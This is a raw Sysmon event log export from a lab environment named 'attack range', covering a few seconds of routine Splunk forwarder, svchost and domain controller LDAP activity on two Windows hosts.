10341000x8000000000000000218052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:22.115{2E1864BB-191D-629A-3447-000000005F02}61565404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044960Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:22.956{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95EFF33235CF529946A04231BDE0D8AB,SHA256=3C459164AC6EB6172BD2A71FB5431DD9CD30517245DA49AA7C47A5378110FC3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044961Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:20.726{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52395-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000218062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:22.671{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56435-false10.0.1.12-8000- 23542300x8000000000000000218061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:24.558{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0973672F3EB41838204A7DD15F8F799E,SHA256=DCF503BF666E1EBCC09033CA97D34498A81F0460E7F9E984D82D60AD0FC8267A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:24.558{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1920-629A-3547-000000005F02}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:24.558{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:24.558{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:24.558{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:24.558{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:24.558{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-1920-629A-3547-000000005F02}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:24.558{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1920-629A-3547-000000005F02}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:24.559{2E1864BB-1920-629A-3547-000000005F02}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044962Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:24.050{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C68E62FC31577FA7304CE7576C32053,SHA256=A52FF2F9420F09F9E7E1F5A2FBA9442745519CA8DD290BE0A9E996952935A9A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044963Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:25.143{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=662110ED3A0692B743A7B2D0DAAFB9B4,SHA256=0806AA9E6EC750BFF6E6CD48B6A46034F8B325A76EC07E695B72A30B4000091D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:26.058{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CA7A35918AE9DF357F79EC91DE3088A,SHA256=7CD02115B53DC86639B855BBB26FBFF35179BA0F5341BEAC2039A8F47D5DCD84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044964Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:26.237{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F62BC09F00E8818B54909B3E319D986F,SHA256=55C761CE2516CC6A88F622D8B76B8B1A4ABD7A979AE66C0B548401B91E92F222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044965Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:27.347{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=608A1E02CFE6F8049E941B516E743ADD,SHA256=45D6D4748C26456D5092EB5DF0B5067432C13707EDA06F53BAAF1E20D4C7F8B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044966Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:28.440{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8357F33CBFA39E0C782387D723EA5F63,SHA256=FD2C7A839C5F7B05AB49C2785BD654EC4E01CC5E52DAD66BEC5F16EB09BA0FF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044968Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:29.534{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3D86F2E388762FC7821A028305DE5B5,SHA256=A3F65CDB0A8CB88E7F46A12DAD51DEC46AFC7D8EA075D1099A8E16F2EE146CB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044967Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:26.585{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52396-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000218064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:27.768{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56436-false10.0.1.12-8000- 23542300x800000000000000044969Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:30.628{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4779972C98D77A52B4E838E78E192E64,SHA256=57B3B1C437CE22607890AA4F9A22F5799C5B54F1A364CC1B9DFDDB85B00D4A0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044970Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:31.722{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=951F612E74D1E65571743A47A24DAC3F,SHA256=F9BA2F164BC2AE828CFBF82054AF723B5915080CD59D970944C7A23D962BE334,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044971Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:32.925{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CB49FCDAF1466E4D0366048C5734334,SHA256=DAEF65953A67783A2065418D533FE0C25F48291FB1AF37E96FA247DB43089851,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044972Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:31.757{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52397-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044973Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:34.018{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CE19C8D7642507E6162E17054C7A908,SHA256=AE1EBA4FCC79D69BEA2F0C31AF44DE8CEC51EE54BB8E3B53450AA957562EC746,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:33.669{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56437-false10.0.1.12-8000- 23542300x800000000000000044974Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:35.112{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB11D391D54FB2F42A38B3DE23E00DE2,SHA256=4639C33611DF3F8D6AA834911FA1A1F3D8783D078C4807AFBC81E92B7A93C61A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044975Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:36.206{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61F9980CD529D68E515FE1F7660DCE70,SHA256=A5048F4C0563FF9DF52691D21908E092DACF43D5A1EC06E062913356FAA17950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044976Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:37.300{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64B55AFA8C118467DC5BD677E3D2C444,SHA256=C1AC879640A5C12102B9410156E425ABE068983E9CC445C0D21A8BF54EA77279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044977Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:38.393{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBDAB4B45127B384E60F0135472A749D,SHA256=435A99BFD017D76F5DFD0E204FB239812CBB84164B35AA9D07A59CF873D64776,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044978Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:39.487{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75531FA88AFE540AEE51C18FD8915F57,SHA256=4500413FBD36A79ECB41D3E2297AB7D47321D7151BB08E80DE9BA76AF6F4151A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044980Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:37.710{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52398-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044979Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:40.581{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD151AE3EFC70AF4826AF2909DD5044C,SHA256=01BAA9D791CB86BCD24703803662E530C7C3EDF866AF2C6442EC0396BECBF592,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:41.243{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F60750834320DDBCCBD7A21FA00E16D3,SHA256=99A6E983DBE7EBEF8A7A86CBEE31FE91BC797156A44FDFCE6BA969B6D06AFA43,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:38.851{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56438-false10.0.1.12-8000- 23542300x8000000000000000218066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:41.186{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B220231146E177708A48AB2449344E1B,SHA256=0410DC79F18955540B0CEB7F0D452C867C33208945BD57FB767DE286230F4486,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044981Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:41.675{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2803EB16E539A43DD981A7777ADE1E0D,SHA256=AE3264FFE701DB695EB41453B4DC0C975F3BD71897A9ED38AE2C6F876AB641D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:42.401{2E1864BB-E13E-6299-0D00-000000005F02}9126544C:\Windows\system32\svchost.exe{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3d877|c:\windows\system32\rpcss.dll+29a97|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000218073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:40.782{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56439-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000218072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:40.782{2E1864BB-E14E-6299-2B00-000000005F02}1040C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56439-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 23542300x8000000000000000218071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:42.254{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4F4EB1D354F7871F2D2AA8EAEE5EF0F,SHA256=9DED78BCE051047FB40CFD3D5D8350777A674EB3212F7EBE1FF3FE68D0135845,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:42.239{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E8769B07EF537B8E3F0E5A7B873C3C,SHA256=886FCAFC0085A5A2258D300620F6DECB6904314B72EA077A54175D0723DB8B43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:42.018{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D6731CC9EC91E3BA614957341D529CD,SHA256=F4A94BF4179E2B0C0BC97E062EFAD63074DD1BAC4734FAC89EBAEC58A813CAF0,IMPHASH=00000000000000000000000000000000falsetrue 